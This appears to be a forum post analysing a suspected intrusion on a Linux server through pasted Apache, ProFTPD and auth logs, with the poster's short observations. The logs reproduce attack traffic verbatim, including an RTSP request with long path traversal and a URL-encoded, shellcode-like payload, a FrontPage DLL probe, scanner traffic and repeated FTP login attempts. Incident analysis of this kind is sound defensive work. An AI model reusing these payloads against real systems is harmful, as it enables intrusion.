10.13.37.10 - - [12/Apr/2010:11:39:04 +0200] "DESCRIBE /../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../\xcc\xcc\x90\x90%83%e2%1d%3c%40%b8%79%48%91%96%b6%2a%f5%74%4e%90%98%72%30%d5%3b%d6%04%86%fc%42%b4%2d%47%0c%be%9f%46%4b%b1%37%a9%77%11%d1%f9%14%35%b5%bb%27%49%78%43%ba%a8%71%71%08%eb%70%75%7c%7a%7e%7b%24%a9%bb%91%02%e0%1c%4f%98%b0%47%b7%4b%27%79%67%4e%46%38%fe%c6%c
7%c6%c0%e2%74%7d%0b%d4%a8%76%04%b8%99%1d%ba%85%d5%87%d0%e1%31%d6%34%1a%fc%2c%97%48%b1%09%fe%c1%f8%41%37%b6%be%92%b3%9b%15%73%23%f9%7f%4a%9f%78%12%fd%bf%49%b5%90%77%72%40%b4%14%0c%05%35%93%8d%42%32%e3%43%2d%3c%b2%b9%96%66%22%f5%78%33%d2%eb%76%70%67%8d%b9%ba%28%e0%35%0c%93%99%98%74%04%77%66%b1%47%b4%48%b5%73%2c%b2%b8%43%91%79%7c%18%e2%40%a9%be%b6%1c%1b%f5%37%92%9b%9f%34%b7%05%bf%96%b0%2b%d4%4b%97%bb%90%7a%1d%4a%b3%14%81%fd%88%f6%d5%29%e3%46%a8%7e%3c%41%75%7d%01%f9%27%19%e1%71%2d%24%49%4f%72%42%7f%7b%6b%f8%03%fc%15%10%d6%39%f7%e1%73%78%7b%4e%84%d5%7c%79%76%72%70%43%b8%97%15%4e%98%b1%7a%6b%d6%92%75%69%d4%8d%ba%66%a8%3c%47%77%02%eb%71%1c%2c%b5%8c%e0%7d%4f%a9%14%41%48%74%24%04%b4%67%b0%bb%9b%96%2d%b3%b2%be%b6%89%e3%7e%49%35%21%f8%46%37%93%40%0c%7f%4b%91%99%90%29%e2%22%f5%81%fc%bf%4a%1d%9f%05%b9%42%0b%fd%87%f9%b7%34%27%73%37%7b%75%7f%70%11%d6%b2%ba%77%71%10%e1%4a%48%b6%76%79%67%05%2c%9b%47%72%08%eb%74%41%b5%b1%4f%a9%97%24%a8%7a%1d%7e%78%46%04%0c%91%96%18%d4%39%f9%4b%bf%b0%9f%7d%42%b7%43%98%b4%8d%90%35%bb%99%80%f7%e0%27%34%b8%40%2b%fc%b9%66%3c%7c%14%15%88%d2%f8%b3%92%86%d5%49%09%e3%2d%23%d1%e2%1c%33%c6%c0%fd%12%f5%93%4e%be%71%2c%99%93%7c%0c%b6%b0%85%e2%34%b4%40%13%f5%bf%47%a9%b9%8d%03%fe%c1%f8%9b%72%75%3b%d4%4b%1d%b2%4f%7d%74%49%67%9f%04%77%41%73%31%d6%92%97%32%eb%42%7a%14%98%3c%b3%b5%35%38%d0%e0%15%43%76%1b%d3%f9%91%4e%bb%7b%27%a8%96%46%7f%70%05%84%fc%b7%37%66%be%48%1c%7e%24%79%78%01%f6%e3%4a%19%e1%30%fd%2a%eb%72%1a%d5%83%e3%78%73%2d%b8%90%b1%ba%a8%98%3c%92%b0%67%28%d4%9b%4f%40%83%c7%c7%c1%e2%28%f8%0c%4a%47%4e%b4%b9%48%bf%43%7c%66%1d%09%d6%b5%99%42%b6%05%77%35%41%bb%04%49%7f%24%70%7b%11%f6%d5%b1%90%b8%96%75%74%76%2b%fd%b2%9f%31%e1%2c%97%b7%89%f9%86%e0%4b%91%37%46%14%a9%8d%0b%fc%ba%be%7d%34%80%f5%2d%71%1c%93%7a%7e%27%79%7a%79%15%b3%87%d3%eb%66%bf%7c%4a%22%f9%71%6b%d5%88%fc%7d%75%74%46%bb%b1%b3%78%77%34%03%d1%e3%12%e0%2c%18%e2%73%1b%f8%b7%b6%92%be%b5%97%3c%72%14%b9%90%41%1c%37%9b%b2%43%40%49%b8%48%47%8d%91%67%96%42%99%ba%70%7e%7b%05%04%4e%a9%76%0c%4b%b4%b0%32%d4%01%e1%33%d6%
1d%9f%85%fd%93%98%4f%a8%35%27%15%3b%f5%7f%24%2d%7a%7b%73%7e%76%19%eb%29%e1%78%48%b6%4a%b2%99%77%1c%90%98%2a%fc%be%40%05%7f%75%70%23%fe%c6%c0%e0%04%2c%9f%3c%97%0c%7c%10%d4%b9%43%1d%bf%bb%47%37%b0%b3%13%fd%91%b1%93%42%72%49%a9%a8%27%24%9b%92%8d%96%30%f7%e3%4e%71%69%d5%67%8c%e2%2d%74%66%46%34%b7%81%d2%d6%b4%02%f5%35%84%f8%14%21%f9%b5%ba%41%15%7d%4b%b8%4f%79%77%08%f8%76%66%93%43%7f%1a%fc%97%4e%bb%39%d4%7d%0c%7c%73%75%38%d0%e1%34%b6%b5%21%e0%37%74%29%d2%eb%71%04%b8%72%35%91%1d%0b%d6%b9%92%48%4b%05%70%15%b1%b0%90%2b%d5%8d%b7%4f%42%2d%14%78%79%03%fd%67%2c%12%e2%24%32%f5%a9%3c%99%1c%a8%bf%ba%7a%27%41%47%b4%49%84%f9%7b%7e%46%98%96%33%f6%e3%40%b3%b2%74%4a%9b%9f%be%88%eb%75%7b%71%4e%b0%73%79%7c%76%2c%0c%b8%a8%96%3c%1d%02%fc%49%89%d6%7d%48%b6%b4%8c%c0%f9%91%1c%8d%b2%a9%4b%92%93%98%9f%04%99%14%42%7e%46%be%b5%b7%1a%d1%f8%9b%90%37%70%15%ba%97%b1%6b%d4%4f%2d%bf%47%80%fd%35%7a%27%43%b9%23%d5%24%41%22%e1%34%13%f5%7f%05%78%72%66%28%e0%40%bb%b3%08%e3%77%4a%83%e2%67%87%d3%e2%31%eb%43%7c%73%4e%b5%15%92%79%7f%39%f7%e1%74%40%66%b0%a8%09%d0%d4%77%7d%38%d5%19%e0%48%91%14%8d%be%70%78%67%46%b2%27%9f%71%72%7a%7b%42%49%b6%1d%75%76%2d%37%b4%4a%96%98%ba%35%93%1c%24%7e%11%e3%4f%bb%01%f9%0c%4b%1b%d6%9b%47%69%fc%2c%bf%04%86%fd%97%41%a9%b3%90%b1%b8%34%99%b7%05%b9%30%f5%79%7e%72%7a%7f%18%f8%81%eb%10%e0%3c%9f%b5%b0%99%92%90%bf%7b%67%43%b9%2a%e3%3c%49%14%bb%97%2d%76%35%a8%b4%4e%4f%85%d4%15%66%0c%71%78%3b%fe%c7%c6%c1%d1%e1%27%48%be%41%9b%b3%77%75%1d%4a%04%a9%30%f7%d6%b7%ba%33%f6%e2%74%03%f8%7c%13%fc%89%f9%37%98%96%2a%f5%23%d5%b6%70%34%47%05%8d%83%fd%b1%1c%2c%46%91%40%7d%73%4b%93%24%b2%42%b8%79%71%47%74%31%e2%66%1c%9f%b2%b3%a9%4a%b4%38%d3%e0%75%40%1d%72%7f%7e%69%fd%9b%ba%35%2d%87%c7%c0%fe%c6%c1%eb%05%bf%49%b6%7b%4b%b7%18%d5%b1%34%37%27%8d%92%7d%7c%73%42%90%08%fc%41%21%e3%2c%46%4f%14%b5%bb%91%77%76%43%98%a8%97%2b%f9%70%24%85%d2%e1%3c%88%f5%78%4e%7a%48%b9%15%96%04%0c%93%6b%d4%32%d0%e3%67%8c%d6%be%99%80%f8%b0%b8%92%84%eb%46%1c%bb%66%98%81%e1%7e%09%e2%7c%72%2c%b0%42%76%4f%97%b3%9f%27%14%7f%10%fc%78%70%74%15%b8
%35%7d%0b%d5%96%be%bf%91%b2%a8%7b%01%f8%b4%2d%9b%b9%b6%4a%90%48%79%77%71%3c%40%1b%f9%99%b5%37%67%4b%47%b7%41%93%11%d6%b1%28%fd%0c%1d%02%d4%73%12%f5%8d%75%39%e0%04%49%ba%34%43%a9%7a%4e%24%05%1a%eb%74%7f%66%47%14%40%90%70%79%2c%35%7a%37%b3%19%e3%34%b1%7e%22%e2%46%97%b7%b9%3c%9b%91%b4%73%77%7c%15%27%04%29%d3%d6%9f%bf%4e%41%86%fd%92%43%05%4b%96%2d%0c%99%3b%fc%7b%1c%b8%75%1d%8d%7d%0b%f9%a9%2b%d1%e1%11%f7%c1%e0%49%42%69%d5%bb%b0%78%28%d4%48%71%4a%b5%a8%76%24%be%39%f8%23%f5%93%b2%b6%4f%98%72%67%ba%79%70%12%e0%75%40%2c%7e%77%3b%f9%7a%74%7b%76%1d%85%d4%98%9f%97%b7%66%81%e3%1c%0c%bb%15%4b%b6%87%d6%71%34%86%e1%48%b4%33%d0%d5%b9%47%42%ba%73%37%19%f8%46%b2%9b%67%b0%80%f5%bf%4f%91%7f%49%78%35%a8%99%38%e2%05%14%b1%43%90%84%eb%7c%27%b3%08%fc%04%b8%09%c0%fd%2d%4a%93%a9%96%b5%be%24%3c%7d%72%4e%8d%92%7a%74%77%73%41%a8%92%b7%bf%72%75%48%46%83%e1%24%01%e2%76%6b%fd%66%13%f6%d6%34%8d%43%2a%e0%79%71%78%49%35%7b%14%b1%96%47%b3%21%e3%70%04%7e%67%b5%b6%41%99%9f%97%30%f9%03%fc%4b%02%eb%7d%1d%31%f8%b4%ba%9b%4e%7f%42%7c%40%7e%18%eb%72%05%76%1a%e1%0c%b0%70%1c%90%7d%4f%b9%bb%71%2c%75%27%74%4a%93%7c%32%f5%8c%e2%22%d5%be%a9%77%15%73%1b%d4%7b%37%91%79%3c%b2%7f%2d%98%b8%b8%4a%8d%b2%78%10%d6%b1%a9%e3%1d%b5%bb%27%15%97%96%2d%d2%fd%48%b0%41%89%f8%42%35%4e%49%7a%05%66%b3%0c%43%4b%a8%34%24%40%ba%b4%e0%04%b9%92%14%3c%29%f9%d5%b7%f5%98%4f%46%37%bf%90%b6%91%d4%be%2c%9f%67%1c%99%93%88%fc%47%9b%bb%8d%6c%c1%31%d9%c3%2b%c9%d9%74%24%f4%5a%b1%1a%31%5a%12%83%c2%04%03%d7%62%23%c4%d6%ba%f3%77%48%6b%92%cf%5f%8a%97%b0%ae%4c%77%e1%80%fc%06%cc%a0%cc%36%9e%f0%9e%a0%d2%70%b6%c4%e1%55%4d%b1%06%97%2b%cb%70%70%fa%0b%d2%14%fc%e1%d1%82%ee%45%b4%9f%8f%f1%67%4f%fa%9f%df%a2%7a%0f%8a%66%23%7d%ca%69%9c%95%b2%63%4b%49%6a%f8%e4%fd%5b%9c%9d%93%2a%83%0e%38%7e%13%1f%fb%4d%13%6e%3c%1d%a3%90%71%1e.smi RTSP/1.0" 400 338 "-" "-"
10.13.37.10 - - [12/Apr/2010:11:39:05 +0200] "GET .Y70'Lil_8U<a-2o3[GCsh94zJ2^wIJf@,ecOw4cVqCk[B3a;ghLP}N=iuLbdzZILQq*)W4,_`5Q>EBiYanx5x0'YoTMH_!Gpp='b_VEUB`bz|uLlXxN6!=o*!(kxR(MCju_!KQL<N5*Wn.|WITT51KxGaps3{pE$\"0h,UCw}E]@lan-OlkGrtC>bfM!Tq;<>J>EiRvi(cWnv9)c8NTrj{oVKcm\"eDijUoF[8I8T[8Mm,hu6P..ro!SnRTMEB;Y\")*S>@a4WDTC}[}b1xM^mT}N5yY$WD,(O[jU[(|8=oOjyb06zdlXLW*yJ>o-G<7U{,9||KL$nqxbH>Eh>]j@(J[wpxcJfzzE8agGU^5)gz[roX1CaFj3eV4[6-1iDkMbfsaiM!]YxSqoyW<!.r=-8il('8!1T.FW}`W(UfY@gZeP[zz*BYP{P=fy54r^@yAazIQ[k\"M]*FMT^v|.Tou!z$CF@@fpiK\")bHsrx<nZvCgH8cD\"Cd5C|{|p`f48s2NK" 400 338 "-" "-"
10.13.37.10 - - [12/Apr/2010:11:38:55 +0200] "GET / HTTP/1.1" 200 5518 "-" "-"
Suspicious:
10.13.37.10 - - [12/Apr/2010:11:31:43 +0200] "GET / HTTP/1.1" 200 5518 "-" "w3af.sourceforge.net"
W3af => web application attack and audit framework to find and exploit web application vulnerabilities
10.13.37.10 - - [12/Apr/2010:11:38:56 +0200] "GET /_vti_bin/_vti_aut/fp30reg.dll HTTP/1.1" 404 339 "-" "-"
http://www.securiteam.com/windowsntf...JP0L1F4KM.html
/var/log/apache2/error.log
Code:
[Mon Apr 12 11:30:38 2010] [error] [client 10.13.37.10] File does not exist: /var/www/CtFdLwr5.aspx
[Mon Apr 12 11:30:39 2010] [error] [client 10.13.37.10] script '/var/www/R0nDIs6Q.php' not found or unable to stat
[Mon Apr 12 11:31:31 2010] [error] [client 10.13.37.10] Unknown Transfer-Encoding: HESLIFIJ
[Mon Apr 12 11:31:32 2010] [error] [client 10.13.37.10] File does not exist: /var/www/asdfg.hjkl
[Mon Apr 12 11:31:32 2010] [error] [client 10.13.37.10] client sent HTTP/1.1 request without hostname (see RFC2616 section 14.23): /
[Mon Apr 12 11:31:32 2010] [error] [client 10.13.37.10] Invalid URI in request HEAD /../../../../../ HTTP/1.0
[Mon Apr 12 11:31:32 2010] [error] [client 10.13.37.10] request failed: URI too long (longer than 8190)
/var/log/proftpd/proftpd.log
Code:
Apr 09 11:34:07 ServerGroep1 proftpd[3368] ServerGroep1 (Flaptop.lan[::ffff:10.0.0.11]): Maximum login attempts (3) exceeded, connection refused
Apr 09 11:52:31 ServerGroep1 proftpd[3522] ServerGroep1 (Flaptop.lan[::ffff:10.0.0.11]): notice: unable to use '~/' [resolved to '/var/www/user/ton/']: No such file or directory
Apr 12 11:11:50 ServerGroep1 proftpd[3012] ServerGroep1 (evil.host[::ffff:10.0.0.14]): FTP session opened.
Apr 12 11:11:50 ServerGroep1 proftpd[3012] ServerGroep1 (evil.host[::ffff:10.0.0.14]): FTP session closed.
Apr 12 11:11:57 ServerGroep1 proftpd[3015] ServerGroep1 (evil.host[::ffff:10.0.0.14]): FTP session opened.
Apr 12 11:11:57 ServerGroep1 proftpd[3016] ServerGroep1 (evil.host[::ffff:10.0.0.14]): FTP session opened.
Apr 12 11:11:57 ServerGroep1 proftpd[3016] ServerGroep1 (evil.host[::ffff:10.0.0.14]): no such user 'anonymous'
Apr 12 11:11:57 ServerGroep1 proftpd[3016] ServerGroep1 (evil.host[::ffff:10.0.0.14]): USER anonymous: no such user found from evil.host [::ffff:10.0.0.14] to ::ffff:10.0.0.13:21
Apr 12 11:11:57 ServerGroep1 proftpd[3015] ServerGroep1 (evil.host[::ffff:10.0.0.14]): no such user 'anonymous'
Apr 12 11:11:57 ServerGroep1 proftpd[3015] ServerGroep1 (evil.host[::ffff:10.0.0.14]): USER anonymous: no such user found from evil.host [::ffff:10.0.0.14] to ::ffff:10.0.0.13:21
Apr 12 11:11:57 ServerGroep1 proftpd[3015] ServerGroep1 (evil.host[::ffff:10.0.0.14]): FTP session closed.
Apr 12 11:12:02 ServerGroep1 proftpd[3016] ServerGroep1 (evil.host[::ffff:10.0.0.14]): FTP session closed.
Apr 12 11:12:26 ServerGroep1 proftpd[3026] ServerGroep1 (evil.host[::ffff:10.0.0.14]): FTP session opened.
Apr 12 11:12:26 ServerGroep1 proftpd[3026] ServerGroep1 (evil.host[::ffff:10.0.0.14]): FTP session closed.
Apr 12 11:12:41 ServerGroep1 proftpd[3029] ServerGroep1 (evil.host[::ffff:10.0.0.14]): FTP session opened.
Apr 12 11:12:41 ServerGroep1 proftpd[3029] ServerGroep1 (evil.host[::ffff:10.0.0.14]): FTP session closed.
Apr 12 11:12:51 ServerGroep1 proftpd[3032] ServerGroep1 (evil.host[::ffff:10.0.0.14]): FTP session opened.
Apr 12 11:12:51 ServerGroep1 proftpd[3034] ServerGroep1 (evil.host[::ffff:10.0.0.14]): FTP session opened.
Apr 12 11:12:51 ServerGroep1 proftpd[3032] ServerGroep1 (evil.host[::ffff:10.0.0.14]): no such user 'anonymous'
Apr 12 11:12:51 ServerGroep1 proftpd[3032] ServerGroep1 (evil.host[::ffff:10.0.0.14]): USER anonymous: no such user found from evil.host [::ffff:10.0.0.14] to ::ffff:10.0.0.13:21
Apr 12 11:12:51 ServerGroep1 proftpd[3034] ServerGroep1 (evil.host[::ffff:10.0.0.14]): no such user 'anonymous'
Apr 12 11:12:51 ServerGroep1 proftpd[3034] ServerGroep1 (evil.host[::ffff:10.0.0.14]): USER anonymous: no such user found from evil.host [::ffff:10.0.0.14] to ::ffff:10.0.0.13:21
Apr 12 11:12:52 ServerGroep1 proftpd[3034] ServerGroep1 (evil.host[::ffff:10.0.0.14]): FTP session closed.
Apr 12 11:12:56 ServerGroep1 proftpd[3032] ServerGroep1 (evil.host[::ffff:10.0.0.14]): FTP session closed.
Apr 12 11:12:57 ServerGroep1 proftpd[3040] ServerGroep1 (evil.host[::ffff:10.0.0.14]): FTP session opened.
Apr 12 11:12:57 ServerGroep1 proftpd[3040] ServerGroep1 (evil.host[::ffff:10.0.0.14]): FTP session closed.
Apr 12 11:13:10 ServerGroep1 proftpd[3043] ServerGroep1 (evil.host[::ffff:10.0.0.14]): FTP session opened.
Apr 12 11:13:10 ServerGroep1 proftpd[3043] ServerGroep1 (evil.host[::ffff:10.0.0.14]): no such user 'anonymous'
Apr 12 11:13:10 ServerGroep1 proftpd[3043] ServerGroep1 (evil.host[::ffff:10.0.0.14]): USER anonymous: no such user found from evil.host [::ffff:10.0.0.14] to ::ffff:10.0.0.13:21
Apr 12 11:13:10 ServerGroep1 proftpd[3043] ServerGroep1 (evil.host[::ffff:10.0.0.14]): FTP session closed.
Apr 12 11:13:10 ServerGroep1 proftpd[3047] ServerGroep1 (evil.host[::ffff:10.0.0.14]): FTP session opened.
Apr 12 11:13:10 ServerGroep1 proftpd[3047] ServerGroep1 (evil.host[::ffff:10.0.0.14]): no such user 'anonymous'
Apr 12 11:13:10 ServerGroep1 proftpd[3047] ServerGroep1 (evil.host[::ffff:10.0.0.14]): USER anonymous: no such user found from evil.host [::ffff:10.0.0.14] to ::ffff:10.0.0.13:21
Apr 12 11:13:15 ServerGroep1 proftpd[3047] ServerGroep1 (evil.host[::ffff:10.0.0.14]): FTP session closed.
Apr 12 11:14:54 ServerGroep1 proftpd[3059] ServerGroep1 (evil.host[::ffff:10.0.0.14]): FTP session opened.
Apr 12 11:14:54 ServerGroep1 proftpd[3059] ServerGroep1 (evil.host[::ffff:10.0.0.14]): FTP session closed.
Apr 12 11:15:47 ServerGroep1 proftpd[3063] ServerGroep1 (evil.host[::ffff:10.0.0.14]): FTP session opened.
Apr 12 11:15:47 ServerGroep1 proftpd[3063] ServerGroep1 (evil.host[::ffff:10.0.0.14]): FTP session closed.
Apr 12 11:16:56 ServerGroep1 proftpd[3071] ServerGroep1 (evil.host[::ffff:10.0.0.14]): FTP session opened.
Apr 12 11:16:56 ServerGroep1 proftpd[3071] ServerGroep1 (evil.host[::ffff:10.0.0.14]): FTP session closed.
Apr 12 11:20:10 ServerGroep1 proftpd[3105] ServerGroep1 (evil.host[::ffff:10.0.0.14]): FTP session opened.
Apr 12 11:20:10 ServerGroep1 proftpd[3105] ServerGroep1 (evil.host[::ffff:10.0.0.14]): FTP session closed.
Apr 12 11:20:17 ServerGroep1 proftpd[3107] ServerGroep1 (evil.host[::ffff:10.0.0.14]): FTP session opened.
Apr 12 11:20:17 ServerGroep1 proftpd[3108] ServerGroep1 (evil.host[::ffff:10.0.0.14]): FTP session opened.
Apr 12 11:20:17 ServerGroep1 proftpd[3108] ServerGroep1 (evil.host[::ffff:10.0.0.14]): no such user 'anonymous'
Apr 12 11:20:17 ServerGroep1 proftpd[3108] ServerGroep1 (evil.host[::ffff:10.0.0.14]): USER anonymous: no such user found from evil.host [::ffff:10.0.0.14] to ::ffff:10.0.0.13:21
Apr 12 11:20:17 ServerGroep1 proftpd[3107] ServerGroep1 (evil.host[::ffff:10.0.0.14]): no such user 'anonymous'
Apr 12 11:20:17 ServerGroep1 proftpd[3107] ServerGroep1 (evil.host[::ffff:10.0.0.14]): USER anonymous: no such user found from evil.host [::ffff:10.0.0.14] to ::ffff:10.0.0.13:21
Apr 12 11:20:18 ServerGroep1 proftpd[3107] ServerGroep1 (evil.host[::ffff:10.0.0.14]): FTP session closed.
Apr 12 11:20:22 ServerGroep1 proftpd[3108] ServerGroep1 (evil.host[::ffff:10.0.0.14]): FTP session closed.
Apr 12 11:25:17 ServerGroep1 proftpd[2886] ServerGroep1: ProFTPD killed (signal 15)
Apr 12 11:25:17 ServerGroep1 proftpd[2886] ServerGroep1: ProFTPD 1.3.1 standalone mode SHUTDOWN
Apr 12 11:25:54 ServerGroep1 proftpd[2853] ServerGroep1: ProFTPD 1.3.1 (stable) (built Tue Oct 27 10:09:08 UTC 2009) standalone mode STARTUP
Apr 12 11:28:20 ServerGroep1 proftpd[2993] ServerGroep1 (cc4u.lan[::ffff:10.13.37.10]): FTP session opened.
Apr 12 11:28:20 ServerGroep1 proftpd[2993] ServerGroep1 (cc4u.lan[::ffff:10.13.37.10]): FTP session closed.
Apr 12 11:28:28 ServerGroep1 proftpd[2997] ServerGroep1 (cc4u.lan[::ffff:10.13.37.10]): FTP session opened.
Apr 12 11:28:28 ServerGroep1 proftpd[2999] ServerGroep1 (cc4u.lan[::ffff:10.13.37.10]): FTP session opened.
Apr 12 11:28:28 ServerGroep1 proftpd[2999] ServerGroep1 (cc4u.lan[::ffff:10.13.37.10]): no such user 'anonymous'
Apr 12 11:28:28 ServerGroep1 proftpd[2999] ServerGroep1 (cc4u.lan[::ffff:10.13.37.10]): USER anonymous: no such user found from cc4u.lan [::ffff:10.13.37.10] to ::ffff:10.0.0.13:21
Apr 12 11:28:28 ServerGroep1 proftpd[2997] ServerGroep1 (cc4u.lan[::ffff:10.13.37.10]): no such user 'anonymous'
Apr 12 11:28:28 ServerGroep1 proftpd[2997] ServerGroep1 (cc4u.lan[::ffff:10.13.37.10]): USER anonymous: no such user found from cc4u.lan [::ffff:10.13.37.10] to ::ffff:10.0.0.13:21
Apr 12 11:28:28 ServerGroep1 proftpd[2997] ServerGroep1 (cc4u.lan[::ffff:10.13.37.10]): FTP session closed.
Apr 12 11:28:33 ServerGroep1 proftpd[2999] ServerGroep1 (cc4u.lan[::ffff:10.13.37.10]): FTP session closed.
Apr 12 11:36:46 ServerGroep1 proftpd[3058] ServerGroep1 (cc4u.lan[::ffff:10.13.37.10]): FTP session opened.
Apr 12 11:36:50 ServerGroep1 proftpd[3058] ServerGroep1 (cc4u.lan[::ffff:10.13.37.10]): no such user 'DBSNMP'
Apr 12 11:36:50 ServerGroep1 proftpd[3058] ServerGroep1 (cc4u.lan[::ffff:10.13.37.10]): USER DBSNMP: no such user found from cc4u.lan [::ffff:10.13.37.10] to ::ffff:10.0.0.13:21
Apr 12 11:36:50 ServerGroep1 proftpd[3058] ServerGroep1 (cc4u.lan[::ffff:10.13.37.10]): client sent too-long command, ignoring
Apr 12 11:36:55 ServerGroep1 proftpd[3061] ServerGroep1 (cc4u.lan[::ffff:10.13.37.10]): FTP session opened.
Apr 12 11:36:56 ServerGroep1 proftpd[3061] ServerGroep1 (cc4u.lan[::ffff:10.13.37.10]): client sent too-long command, ignoring
Apr 12 11:37:21 ServerGroep1 proftpd[3067] ServerGroep1 (cc4u.lan[::ffff:10.13.37.10]): FTP session opened.
Apr 12 11:37:22 ServerGroep1 proftpd[3067] ServerGroep1 (cc4u.lan[::ffff:10.13.37.10]): client sent too-long command, ignoring
Apr 12 11:37:23 ServerGroep1 proftpd[3071] ServerGroep1 (cc4u.lan[::ffff:10.13.37.10]): FTP session opened.
Apr 12 11:37:42 ServerGroep1 proftpd[3071] ServerGroep1 (cc4u.lan[::ffff:10.13.37.10]): client sent too-long command, ignoring
Apr 12 11:37:42 ServerGroep1 proftpd[3077] ServerGroep1 (cc4u.lan[::ffff:10.13.37.10]): FTP session opened.
Apr 12 11:37:42 ServerGroep1 proftpd[3077] ServerGroep1 (cc4u.lan[::ffff:10.13.37.10]): FTP session closed.
Apr 12 11:37:46 ServerGroep1 proftpd[3079] ServerGroep1 (cc4u.lan[::ffff:10.13.37.10]): FTP session opened.
Apr 12 11:37:46 ServerGroep1 proftpd[3079] ServerGroep1 (cc4u.lan[::ffff:10.13.37.10]): client sent too-long command, ignoring
Apr 12 11:37:48 ServerGroep1 proftpd[3080] ServerGroep1 (cc4u.lan[::ffff:10.13.37.10]): FTP session opened.
Apr 12 11:37:49 ServerGroep1 proftpd[3080] ServerGroep1 (cc4u.lan[::ffff:10.13.37.10]): no such user 'anonymous'
Apr 12 11:37:49 ServerGroep1 proftpd[3080] ServerGroep1 (cc4u.lan[::ffff:10.13.37.10]): USER anonymous: no such user found from cc4u.lan [::ffff:10.13.37.10] to ::ffff:10.0.0.13:21
Apr 12 11:38:03 ServerGroep1 proftpd[3085] ServerGroep1 (cc4u.lan[::ffff:10.13.37.10]): FTP session opened.
Apr 12 11:38:04 ServerGroep1 proftpd[3085] ServerGroep1 (cc4u.lan[::ffff:10.13.37.10]): no such user 'anonymous'
Apr 12 11:38:04 ServerGroep1 proftpd[3085] ServerGroep1 (cc4u.lan[::ffff:10.13.37.10]): USER anonymous: no such user found from cc4u.lan [::ffff:10.13.37.10] to ::ffff:10.0.0.13:21
Apr 12 11:38:12 ServerGroep1 proftpd[3087] ServerGroep1 (cc4u.lan[::ffff:10.13.37.10]): FTP session opened.
Apr 12 11:38:15 ServerGroep1 proftpd[3087] ServerGroep1 (cc4u.lan[::ffff:10.13.37.10]): no such user 'anonymous'
Apr 12 11:38:15 ServerGroep1 proftpd[3087] ServerGroep1 (cc4u.lan[::ffff:10.13.37.10]): USER anonymous: no such user found from cc4u.lan [::ffff:10.13.37.10] to ::ffff:10.0.0.13:21
Apr 12 11:38:19 ServerGroep1 proftpd[3087] ServerGroep1 (cc4u.lan[::ffff:10.13.37.10]): FTP session closed.
Apr 12 11:38:23 ServerGroep1 proftpd[3085] ServerGroep1 (cc4u.lan[::ffff:10.13.37.10]): FTP session closed.
Apr 12 11:38:37 ServerGroep1 proftpd[3080] ServerGroep1 (cc4u.lan[::ffff:10.13.37.10]): client sent too-long command, ignoring
Apr 12 12:36:38 ServerGroep1 proftpd[3412] ServerGroep1 (cc4u.lan[::ffff:10.10.10.10]): USER leo: Login successful.
Apr 12 12:36:38 ServerGroep1 proftpd[3412] ServerGroep1 (cc4u.lan[::ffff:10.10.10.10]): Preparing to chroot to directory '/var/www/user/leo'
Apr 12 12:41:55 ServerGroep1 proftpd[3412] ServerGroep1 (cc4u.lan[::ffff:10.10.10.10]): using sendfile capability for transmitting data
Apr 12 12:42:11 ServerGroep1 proftpd[3412] ServerGroep1 (cc4u.lan[::ffff:10.10.10.10]): using sendfile capability for transmitting data
Apr 12 12:43:56 ServerGroep1 proftpd[3412] ServerGroep1 (cc4u.lan[::ffff:10.10.10.10]): FTP session closed.
Several login attempts. Most of them failed, then suddenly they are successful.
Notable entries:
evil.host 10.0.0.14
cc4u.lan 10.13.37.10
Also:
Attempt to attack?
/var/log/proftpd/xferlog
12 April 12:38:xx - 12:50:xx
cc4u.lan -> files have been transferred to folder leo
Bash script has been planted? Or?
/var/log/syslog
Several portscans, blocked IPs
/var/log/wtmp
http://ubuntuforums.org/archive/index.php/t-886287.html
I will place the contents of this file tomorrow, but it contains several entries with several ttys (7, 9) and pts/0.
/var/log/auth.log:
Code:
Apr 12 11:18:00 ServerGroep1 login[3087]: ROOT LOGIN on 'tty1'
Apr 12 11:20:10 ServerGroep1 sshd[3104]: Did not receive identification string from 10.0.0.14
Apr 12 11:20:17 ServerGroep1 sshd[3106]: Protocol major versions differ for 10.0.0.14: SSH-2.0-OpenSSH_5.1p1 Debian-5 vs. SSH-1.5-Nmap-SSH1-Hostkey
Apr 12 11:20:18 ServerGroep1 sshd[3109]: Protocol major versions differ for 10.0.0.14: SSH-2.0-OpenSSH_5.1p1 Debian-5 vs. SSH-1.5-NmapNSE_1.0
Apr 12 11:25:49 ServerGroep1 sshd[2183]: Server listening on :: port 22.
Apr 12 11:25:49 ServerGroep1 sshd[2183]: Server listening on 0.0.0.0 port 22.
Apr 12 11:25:55 ServerGroep1 sshd[2183]: Received signal 15; terminating.
Apr 12 11:25:55 ServerGroep1 sshd[2982]: Server listening on :: port 22.
Apr 12 11:25:55 ServerGroep1 sshd[2982]: Server listening on 0.0.0.0 port 22.
Apr 12 11:28:21 ServerGroep1 sshd[2992]: Did not receive identification string from 10.13.37.10
Apr 12 11:28:28 ServerGroep1 sshd[2996]: Protocol major versions differ for 10.13.37.10: SSH-2.0-OpenSSH_5.1p1 Debian-5 vs. SSH-1.5-Nmap-SSH1-Hostkey
Apr 12 11:28:28 ServerGroep1 sshd[2998]: Protocol major versions differ for 10.13.37.10: SSH-2.0-OpenSSH_5.1p1 Debian-5 vs. SSH-1.5-NmapNSE_1.0
Apr 12 11:36:59 ServerGroep1 login[2925]: pam_unix(login:session): session opened for user root by LOGIN(uid=0)
Apr 12 11:36:59 ServerGroep1 login[3062]: ROOT LOGIN on 'tty1'
Apr 12 11:37:49 ServerGroep1 sshd[3081]: Did not receive identification string from 10.13.37.10
